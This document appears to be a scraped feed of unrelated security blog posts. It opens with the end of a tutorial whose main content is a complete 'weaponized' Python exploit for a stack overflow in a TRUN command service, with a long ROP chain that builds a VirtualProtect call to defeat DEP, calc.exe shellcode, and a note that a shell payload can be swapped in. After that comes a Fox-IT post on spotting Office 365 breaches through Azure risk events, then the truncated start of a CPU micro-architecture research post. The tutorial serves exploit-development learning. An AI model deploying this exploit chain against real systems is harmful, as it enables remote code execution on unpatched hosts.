rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)  # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop ebp instruction in the above ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

EAX gets “zeroed out”:

EAX now contains the value of what we would like the size parameter to be:

The memory address of the size parameter now points to the value of EAX, which is 0x300!:

It is time now to calculate the flNewProtect parameter.

0x40 is the intended value here. It is placed into EAX:

Then, EDX is increased by four and the DWORD within EDX (the flNewProtect placeholder) is manipulated to point to the value of EAX- which is 0x40! All of our parameters have successfully been added to the stack!:

All that is left now is to jump back to the VirtualProtect call! But how will we do this?!

Remember very early in this tutorial, when we saved the old stack pointer into ECX? Then, we performed some calculations on ECX to increase it to equal the first “parameter”, the return address? Recall that the return address is four bytes greater than the place where VirtualProtect() is called. This means if we can decrement ECX by four bytes, it would contain the address of the call to VirtualProtect().
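To make that concrete, here is the layout of the fake VirtualProtect frame we built at the start, with offsets relative to the stack pointer that was saved into ECX and EAX (derived from the chain above):

# Offsets relative to the saved ESP (which pointed at the "mov eax, ecx" gadget on the stack):
#   [saved ESP + 0x08]  kernel32.VirtualProtect()       <- where ESP needs to end up
#   [saved ESP + 0x0C]  return address -> shellcode     <- ECX was advanced to this slot
#   [saved ESP + 0x10]  lpAddress      -> shellcode
#   [saved ESP + 0x14]  size            = 0x300
#   [saved ESP + 0x18]  flNewProtect    = 0x40
#   [saved ESP + 0x1C]  pOldProtect     = writable address
#
# ECX (saved ESP + 0x0C) minus four bytes is saved ESP + 0x08: the slot holding the
# VirtualProtect() call itself.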

However, in assembly, one of the best registers for calculations is EAX. Since we are done with the parameters, we will move the value of ECX into EAX and then decrement EAX by four bytes. Then, we will exchange the EAX register (which now holds the address of the call to VirtualProtect()) with ESP. At this point, the VirtualProtect() address will be at ESP. Since the exchange instruction is part of a ROP gadget, the ret at the end of the gadget will pop the value at the new ESP (the VirtualProtect() address) into EIP- thus executing the call to VirtualProtect() with all of the correct parameters on the stack!

There is one problem, though. In the very beginning, we prepared the arguments for return and lpAddress, which should contain the address of the shellcode (or of the NOPs right before the shellcode). At that point we only accounted for a 0x100-byte gap between those parameters and our shellcode. We have added a lot of ROP gadgets since then, so our shellcode is no longer located 0x100 bytes from the VirtualProtect() parameters.

There is a simple solution to this: we will make the address of return and lpAddress 0x100 bytes greater.

This will be changed at this part of the POC:

---
# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget
---

We will update it to the following, to make it 0x100 bytes greater and land around our shellcode:

---
# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget
---

ROP gadgets for decrementing ECX, moving ECX into EAX, and exchanging EAX with ESP:

0x77e4a5e6: mov eax, ecx ; ret  ; kernel32.dll
0x41ac863b: dec eax ; dec eax ; ret  ;  WS2_32.dll
0x77d6fa6a: xchg eax, esp ; ret  ;  ntdll.dll

After all of the changes have been made, here is the final weaponized exploit:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, i.e. where to jump after the VirtualProtect call; not officially a part of the "parameters")
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Preparing the VirtualProtect size parameter (third parameter)
# Changing EAX to equal the third parameter, size (0x300).
# Increase EDX 4 bytes (to reach the VirtualProtect size parameter placeholder.)
# Remember, EDX currently is located at the VirtualProtect lpAddress placeholder.
# The size parameter is located 4 bytes after the lpAddress parameter
# Lastly, point EAX to new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)   # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Preparing the VirtualProtect flNewProtect parameter (fourth parameter)
# Changing EAX to equal the fourth parameter, flNewProtect (0x40)
# Increase EDX 4 bytes (to reach the VirtualProtect flNewProtect placeholder.)
# Remember, EDX currently is located at the VirtualProtect size placeholder.
# The flNewProtect parameter is located 4 bytes after the size parameter.
# Lastly, point EAX to the new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)  # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x77bd6b18)	# 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)  # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop ebp instruction in the above ROP gadget

# Now we need to return to where the VirtualProtect call is on the stack.
# ECX contains a value around the old stack pointer at this time (from the beginning). Put ECX into EAX
# and decrement EAX to get back to the function call- and then load EAX into ESP.
# Restoring the old stack pointer here.
rop2 += struct.pack ('<L', 0x77e4a5e6)   # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the flNewProtect ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the flNewProtect ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the flNewProtect ROP gadget
rop2 += struct.pack ('<L', 0x41ac863b)   # 0x41ac863b: dec eax ; dec eax ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41ac863b)  # 0x41ac863b: dec eax ; dec eax ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77d6fa6a)   # 0x77d6fa6a: xchg eax, esp ; ret  ;  (1 found)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

ECX is moved into EAX:

EAX is then decremented by four bytes, to equal where the call to VirtualProtect() occurs on the stack:

EAX is then exchanged with ESP (EAX and ESP swap values):

As you can see, ESP points to the function call- and the ret loads that function call into the instruction pointer to kick off execution!:

Our calc.exe payload has been executed- and DEP has been defeated (the PowerShell window shows the DEP policy; open the image in a new tab to view it better)!!!!!:

You could certainly replace the calc.exe payload with something like a shell! This was just a POC payload, and there is something about shellcoding by hand that I love, too. ROP is so manual and requires living off the land, so I wanted a shellcode that reflected that same philosophy.

Final Thoughts

Please email me if you have any further questions! I can try to answer them as best I can. As I continue to start getting into more and more modern day exploit mitigation bypasses, I hope I can document some more of my discoveries and advances in exploit development.

Peace, love, and positivity :-)

ROP is different every time. There is no one way to do it. However, I did learn a lot from this article, and referenced it. Thank you, Peter! :) You are a beast!

Office 365: prone to security breaches?

By: Fox IT
11 September 2019 at 11:30

Author: Willem Zeeman

“Office 365 again?”. At the Forensics and Incident Response department of Fox-IT, this is heard often.  Office 365 breach investigations are common at our department.
You’ll find that this blog post actually doesn’t make a case for Office 365 being inherently insecure – rather, it discusses some of the predictability of Office 365 that adversaries might use and mistakes that organisations make. The final part of this blog describes a quick check for signs if you already are a victim of an Office 365 compromise. Extended details about securing and investigating your Office 365 environment will be covered in blogs to come.

Office 365 is predictable
A lot of adversaries seem to have a financial motivation for trying to breach an email environment. A typical adversary doesn’t want to waste too much time searching for the right way to access the email system, despite the fact that it is often enough to browse to an address like https://webmail.companyname.tld. But why would the adversary risk encountering a custom or extra-secure web page? Why would the adversary accept the uncertainty of having to deal with a certain email protocol in use by the particular organisation? Why guess the URL? It’s much easier to use the “Cloud approach”.

In this approach, an adversary first collects a list of valid credentials (email address and password), most frequently gathered with the help of a successful phishing campaign. When credentials have been captured, the adversary simply browses to https://office.com and tries them. If there’s no second type of authentication required, they are in. That’s it. The adversary is now in paradise, because after gaining access, they also know what to expect here. Not some fancy or out-dated email system, but an Office 365 environment just like all the others. There’s a good chance that the compromised account owns an Exchange Online mailbox too.

In predictable environments, like Office 365, it’s also much easier to automate your process of evil intentions. The adversary may create a script or use some tooling, complement it with the gathered list of credentials and sit back. Of course, an adversary may also target a specific on-premises system configuration, but seen from an opportunistic point of view, why would they? According to Microsoft, more than 180 million people are using their popular cloud-based solution. It’s far more effective to try another set of credentials and enter another predictable environment than it is to spend time in figuring out where information might be available, and how the environment is configured.

Office 365 is… secure?
Well, yes, Office 365 is a secure platform. The truth is that it has a lot more easy-to-deploy security capabilities than the most common on-premises solutions. The issue here is that organisations seem to not always realise what they could and should do to secure Office 365.

Best practices for securing your Office 365 environment will be covered in a later blog, but here's a sneak preview: more than 90% of the Office 365 breaches investigated by Fox-IT would not have happened if the organisation had had multi-factor authentication in place. No, implementation doesn't need to be a hassle. Yes, it's a free-to-use option. Other security measures, like receiving automatic alerts on suspicious activity detected by built-in Office 365 processes, are free as well, but often neglected.

Simple preventive solutions like these are not even commonly available in on-premises environments. It almost seems that many companies assume they get perfect security right out of the box, rather than configuring the platform to their needs. This may be the reason why organisations do not even bother configuring Office 365 in a more secure way. That's a pity, especially when securing your environment is often just a few cloud-clicks away. Office 365 may not be less secure than an on-premises solution, but it might be more prone to being compromised, thanks to the lack of involved expertise and to adversaries who know how to take advantage of this. Microsoft already offers multi-factor authentication to reduce the impact of attacks like phishing. This is great news, because we know from experience that most of the compromises we see could have been prevented if those companies had used MFA. However, compelling more organisations to adopt MFA remains an ongoing challenge, and how to drive increased adoption remains an open question.

A lot of organisations are already compromised. Are you?
At our department we often see that it may take months(!) for an organisation to realise that they have been compromised. In Office 365 breaches, the adversary is often detected due to an action that causes so much noise that it's no longer possible for the adversary to hide. When the adversary thinks it's no longer beneficial to persist, the next step is to try to gain a foothold in another organisation. In our investigations, we see that when this happens, the adversary has already tried reaching a financial goal. This financial goal is often achieved by successfully committing a payment-related fraud in which they use an employee's internal email account to mislead someone. Eventually, to advance into another organisation, a phishing email is sent by the adversary to a large part of the organisation's address list. In the end, somebody will likely take the bait and leave their credentials on a malevolent, adversary-controlled website. If a victim does, the story starts over again at the other organisation. For the adversary, it's just a matter of repeating the steps.

The step to gain foothold in another organisation is also the moment that a lot of (phishing) email messages are flowing out of the organisation. Thanks to Office 365 intelligence, these are automatically blocked if the number of messages surpasses a given limit based on the user’s normal email behaviour. This is commonly the moment where the victim gets in touch with their system administrator, asking why they can’t send any email anymore. Ideally, the system administrator will quickly notice the email messages containing malicious content and report the incident to the security team.

For now, let's assume you do not have the basic precautions set up, and you want to know if somebody is lurking in your Office 365 environment. You could hire experts to forensically scrutinize your environment, and that would be a correct answer. There actually is a relatively easy way to check whether Microsoft's security intelligence has already detected some bad stuff. In this blog we will zoom in on one of these methods. Please keep in mind that a full discussion of the range of available methods is beyond the scope of this blog post. This blog post describes the method that, from our perspective, gives quick insight into checking (after the fact) for signs of a breach. The not-so-obvious part of this step is that you will find the output in Microsoft Azure, rather than in Office 365. A big part of the Office 365 environment is actually based on Microsoft Azure, and so is its authentication. This is why it's usually[1] possible to log in at the Azure portal and check for Risk events.

The steps:

  1. Go to https://portal.azure.com and sign-in with your Office 365 admin account[2]
  2. At the left pane, click Azure Active Directory
  3. Scroll down to the part that says Security and click Risk events
  4. If there are any risky events, these will be listed here. For example, impossible travels are one of the more interesting events to pay attention to. These may look like this:

This risk event type identifies two sign-ins from the same account, originating from geographically distant locations, within a period too short for the geographical distance to be covered. Other unusual sign-ins are also flagged by machine learning algorithms. Impossible travel is usually a good indicator that an adversary was able to successfully sign in. However, false positives may occur when a user is traveling, using a new device, or using a VPN.

Apart from the impossible travel registrations, Azure also has a lot of other automated checks which might be listed in the Risk events section. If you have any doubts about these, or if a compromise seems likely: please get in contact with your security team as fast as possible. If your security team needs help in the investigation or mitigation, contact the FoxCERT team. FoxCERT is available 24/7 by phone on +31 (0)800 FOXCERT (+31 (0)800-3692378).

[1] Disregarding more complex federated setups, and assuming the licensing model permits.

[2] The risky sign-ins reports are available to users in the following roles: Security Administrator, Global Administrator, Security Reader. Source: https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/concept-risky-sign-ins


Sushi Roll: A CPU research kernel with minimal noise for cycle-by-cycle micro-architectural introspection

19 August 2019 at 07:11

Twitter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I also do random one-off posts for cool data that doesn’t warrant an entire blog!

Summary

In this blog we’re going to go into details about a CPU research kernel I’ve developed: Sushi Roll. This kernel uses multiple creative techniques to measure undefined behavior on Intel micro-architectures. Sushi Roll is designed to have minimal noise such that tiny micro-architectural events can be measured, such as speculative execution and cache-coherency behavior. With creative use of performance counters we’re able to accurately plot micro-architectural activity on a graph with an x-axis in cycles.

We’ll go a lot more into detail about what everything in this graph means later in the blog, but here’s a simple example of just some of the data we can collect:

Example uarch activity Example cycle-by-cycle profiling of the Kaby Lake micro-architecture, warning: log-scale y-axis

Agenda

This is a relatively long blog and will be split into 4 major sections.

  • The gears that turn in your CPU: A high-level explanation of modern Intel micro-architectures
  • Sushi Roll: The design of the low-noise research kernel
  • Cycle-by-cycle micro-architectural introspection: A unique usage of performance counters to observe cycle-by-cycle micro-architectural behaviors
  • Results: Putting the pieces together and making graphs of cool micro-architectural behavior

Why?

In the past year I’ve spent a decent amount of time doing CPU vulnerability research. I’ve written proof-of-concept exploits for nearly every CPU vulnerability, from many attacker perspectives (user leaking kernel, user/kernel leaking hypervisor, guest leaking other guest, etc). These exploits allowed us to provide developers and researchers with real-world attacks to verify mitigations.

CPU research happens to be an overlap of my two primary research interests: vulnerability research and high-performance kernel development. I joined Microsoft in the early winter of 2017 and this lined up pretty closely with the public release of the Meltdown and Spectre CPU attacks. As I didn’t yet have much on my plate, the idea was floated that I could look into some of the CPU vulnerabilities. I got pretty lucky with this timing, as I ended up really enjoying the work and ended up sinking most of my free time into it.

My workflow for research often starts with writing some custom tools for measuring and analysis of a given target. Whether the target is a web browser, PDF parser, remote attack surface, or a CPU, I’ve often found that the best thing you can do is just make something new. Try out some new attack surface, write a targeted fuzzer for a specific feature, etc. Doing something new doesn’t have to be better or more difficult than something that was done before, as often there are completely unexplored surfaces out there. My specialty is introspection. I find unique ways to measure behaviors, which then fuels the idea pool for code auditing or fuzzer development.

This leads to an interesting situation in CPU research… it’s largely blind. Lots of the current CPU research is done based on writing snippets of code and reviewing the overall side-effects of it (via cache timing, performance counters, etc). These overall side-effects may also include noise from other processor activity, from the OS task switching processes, other cores changing the MESI-state of cache lines, etc. I happened to already have a low-noise no-shared-memory research kernel that I developed for vectorized emulation on Xeon Phis! This led to a really good starting point for throwing in some performance counters and measuring CPU behaviors… and the results were a bit better than expected.

TL;DR: I enjoy writing tools to measure things, so I wrote a tool to measure undefined CPU behavior.


The gears that turn in your CPU

Feel free to skip this section entirely if you’re familiar with modern processor architecture

Your modern Intel CPU is a fairly complex beast when you care about every technical detail, but let’s look at it from a higher level. Here’s what the micro-architecture (uArch) looks like in a modern Intel Skylake processor.

Skylake diagram Skylake uArch diagram, Diagram from WikiChip

There are 3 main components: The front end, which converts complex x86 instructions into groups of micro-operations. The execution engine, which executes the micro-operations. And the memory subsystem, which makes sure that the processor is able to get streams of instructions and data.


Front End

The front end covers almost everything related to figuring out which micro-operations (uops) need to be dispatched to the execution engine in order to accomplish a task. The execution engine on a modern Intel processor does not directly execute x86 instructions, rather these instructions are converted to these micro-operations which are fixed in size and specific to the processor micro-architecture.

Instruction fetch and cache

There’s a lot that happens prior to the actual execution of an instruction. First, the memory containing the instruction is read into the L1 instruction cache, ideally brought in from the L2 cache so as to minimize delay. At this point the instruction is still a macro-op (a variable-length x86 instruction), which is quite a pain to work with. The processor still doesn’t know how large the instruction is, so during pre-decode the processor will do an initial length decode to determine the instruction boundaries.

At this point the instruction has been chopped up and is ready for the instruction queue!

Instruction Queue and Macro Fusion

Instructions that come in for execution might be quite simple, and could potentially be “fused” into a complex operation. This stage is not publicly documented, but we know that a very common fusion is combining compare instructions with conditional branches. This allows a common instruction pattern like:

cmp rax, 5
jne .offset

To be combined into a single macro-op with the same semantics. This complex fused operation now only takes up one slot in many parts of the CPU pipeline, rather than two, freeing up more resources to other operations.

Decode

